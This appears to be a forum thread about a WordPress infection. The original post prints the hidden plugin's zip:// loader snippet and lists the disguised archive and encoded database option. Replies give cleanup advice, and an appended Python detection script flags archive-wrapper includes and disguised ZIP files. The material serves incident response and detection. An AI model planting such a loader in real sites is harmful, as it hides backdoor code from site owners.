I have found malware on the client site. Hacking probably happened 5 days ago.
Info about malware:
- there is an active hidden plugin in the plugins folder with the name 'themename-wp-plugin'
- the plugin is simple and is loading:
    function wp_themename_theme_load() {
        load_template( "zip://" . locate_template( "themename.theme" ) . "#archive", true );
    }
    add_action( 'wp_loaded', 'wp_themename_theme_load' );
- there is a file in the theme, 'themename.theme'
- there is an autoloading option named 'themenametemplate-wp-plugin' in wp_options with some encoded string
This is the info that I currently have. I don't know what the vector of the attack was. I have restored the site from backup.
I hope this will help someone, or that someone will provide more details, because I didn't find info on the web or with OpenAI.

Do a simple scan with Wordfence or Sucuri and see what they say.
Okay, do you use any type of theme plugins, staging, plugins, theme switchers, etc.?
Make a backup and then delete the folder, see if the site still operates and watch for the folder to come back.
If you have access to webserver access logs, it’s a good way to find a source where it started.
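
The two file-level indicators described in the original post (a PHP file that loads code through the zip:// stream wrapper, and a ZIP archive stored under a non-archive extension such as 'themename.theme') can be checked for across wp-content with a short script. This is an added example, not code from the thread; the plugin file name, the theme directory name and the sample tree are constructed assumptions, and the phar:// check is an addition beyond what the post reports.

```python
import os
import re
import tempfile
import zipfile

# Quoted PHP stream wrappers that let include/load_template run code from an archive.
WRAPPER_RE = re.compile(rb"""["'](zip|phar)://""", re.IGNORECASE)
ZIP_MAGIC = b"PK\x03\x04"  # local file header at the start of a non-empty ZIP


def scan_wp_content(root):
    """Return sorted (relative_path, reason) findings under a wp-content directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            try:
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            rel = os.path.relpath(path, root)
            if ext == ".php" and WRAPPER_RE.search(data):
                findings.append((rel, "php-archive-wrapper"))
            if data.startswith(ZIP_MAGIC) and ext != ".zip":
                findings.append((rel, "disguised-zip"))
    return sorted(findings)


def build_constructed_sample(root):
    """Create a harmless, constructed tree mirroring the layout in the post."""
    # Hypothetical names: 'themename-wp-plugin.php' and the 'themename' theme dir.
    plugin = os.path.join(root, "plugins", "themename-wp-plugin")
    theme = os.path.join(root, "themes", "themename")
    for d in (plugin, theme):
        os.makedirs(d)
    with open(os.path.join(plugin, "themename-wp-plugin.php"), "w") as fh:
        fh.write('<?php load_template( "zip://" . locate_template( '
                 '"themename.theme" ) . "#archive", true );\n')
    with zipfile.ZipFile(os.path.join(theme, "themename.theme"), "w") as zf:
        zf.writestr("archive", "<?php /* constructed placeholder */ ")
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write("<?php // ordinary theme file, should not be flagged\n")


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_constructed_sample(root)
        return scan_wp_content(root)
```

On a real site, call scan_wp_content() with the path to wp-content; the autoloaded wp_options entry mentioned in the post lives in the database and is not covered by this file scan.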